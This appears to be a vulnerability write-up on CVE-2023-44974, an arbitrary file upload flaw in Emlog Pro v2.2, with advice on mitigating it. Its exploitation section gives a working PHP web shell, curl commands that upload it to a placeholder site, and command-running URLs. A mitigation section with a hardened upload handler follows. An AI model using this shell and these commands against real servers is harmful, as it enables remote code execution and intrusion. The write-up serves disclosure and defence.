CVE-2023-44974 - Arbitrary File Upload & Code Execution in Emlog Pro v2.2.
In October 2023, a critical security vulnerability, CVE-2023-44974, was discovered in the blogging platform Emlog Pro v2.2. This flaw allows an attacker to upload arbitrary files, including malicious PHP scripts, via the /admin/plugin.php component. By exploiting this bug, an attacker can easily gain remote code execution on the web server. This guide details how the vulnerability works, shows how it is exploited, and offers mitigation advice.
What is Emlog Pro?
Emlog is a popular open-source PHP-based blog and CMS. Version 2.2 is affected by this vulnerability, putting many websites at risk.
How Does the Vulnerability Work?
The vulnerable code does not properly validate or restrict file uploads on the /admin/plugin.php endpoint. Instead of filtering out potentially harmful files (such as .php scripts), it lets users upload any file, including executable PHP scripts, into a directory that the web server serves.
Once a malicious PHP file is uploaded, the attacker can open it in a web browser and execute arbitrary code on the server.
Here is a simplified PHP snippet demonstrating the kind of insecure logic that leads to this flaw:
<?php
// plugin.php (simplified vulnerable logic)
if (isset($_FILES['file'])) {
    $upload_dir = '../content/plugins/';
    // The client-supplied filename is used as-is, so "shell.php" stays "shell.php"
    $filename = $_FILES['file']['name'];
    $tmp_name = $_FILES['file']['tmp_name'];
    // NO validation of extension, content type, or caller identity!
    move_uploaded_file($tmp_name, $upload_dir . $filename);
    echo "File uploaded!";
}
Step-by-Step Exploitation
Let's see how an attacker would exploit this vulnerability.
Create a simple PHP shell (e.g., shell.php):
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
This tiny script will run any command passed as ?cmd= in the URL.
Use curl to send the file to the vulnerable website:
curl -F "file=@shell.php" http://target-site.com/admin/plugin.php
If the site responds with "File uploaded!" the attack worked.
Now visit the uploaded file:
http://target-site.com/content/plugins/shell.php?cmd=whoami
The server responds with its username, proving code execution.
Here's a one-liner exploit payload using curl:
curl -F "file=@shell.php" http://target-site.com/admin/plugin.php
# Now access: http://target-site.com/content/plugins/shell.php?cmd=ls
Mitigation
- Upgrade: Ensure your Emlog installation is updated to the latest version. Check the Emlog official download page.
- Input Validation: Always check file types and extensions server-side.
- Restrict Upload Folders: Prevent .php files from being uploaded or executed in content folders.
- Authentication: Require admin authentication for sensitive endpoints like /admin/plugin.php.
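To make these mitigations concrete, here is a hardened version of the upload handler sketched above. It is an added example, not Emlog's own code: the $_SESSION['is_admin'] check, the .zip-only allowlist, the size limit and the private destination directory are all assumptions.

```php
<?php
// Hardened upload handler (added example, not Emlog's code).
// Assumptions: an authenticated admin session sets $_SESSION['is_admin'],
// plugins arrive as .zip archives, and uploads are stored in a directory
// that the web server neither serves nor executes.
session_start();
if (empty($_SESSION['is_admin'])) {
    http_response_code(403);
    exit('Authentication required');
}
if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    http_response_code(400);
    exit('No file uploaded');
}
$tmp_name = $_FILES['file']['tmp_name'];
if (!is_uploaded_file($tmp_name)) {
    http_response_code(400);
    exit('Invalid upload');
}
// Enforce a size limit (assumed 5 MiB) before inspecting content.
if ($_FILES['file']['size'] > 5 * 1024 * 1024) {
    http_response_code(413);
    exit('File too large');
}
// Check the extension of the client-supplied name against a strict allowlist.
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if ($ext !== 'zip') {
    http_response_code(415);
    exit('Only .zip plugin archives are accepted');
}
// Check the actual content type, not the client-supplied $_FILES[...]['type'].
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime  = $finfo->file($tmp_name);
if ($mime !== 'application/zip') {
    http_response_code(415);
    exit('Content is not a zip archive');
}
// Never reuse the client-supplied filename; generate a random one instead.
$upload_dir = '/var/www/emlog_private/plugin_uploads/'; // assumed path outside the webroot
$dest = $upload_dir . bin2hex(random_bytes(16)) . '.zip';
if (!move_uploaded_file($tmp_name, $dest)) {
    http_response_code(500);
    exit('Upload failed');
}
chmod($dest, 0640); // readable by the app, never executable
echo 'File uploaded';
```

Pair this with a web-server rule that refuses to execute scripts under content/plugins/, so that even a bypass of the checks cannot turn an uploaded file into code execution.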
Additional Resources
- Emlog Official Site
- CVE Details for CVE-2023-44974
- Exploit Database – Emlog Arbitrary File Upload
Summary
CVE-2023-44974 is dangerously simple to exploit: upload a PHP file via the insecure /admin/plugin.php, then access it via the web. Anyone running Emlog Pro v2.2 or older should patch immediately to close this critical security hole. Always sanitize file uploads and limit permissions on directories that handle user files.
Timeline
Published on: 10/03/2023 21:15:10 UTC
Last modified on: 10/05/2023 15:17:48 UTC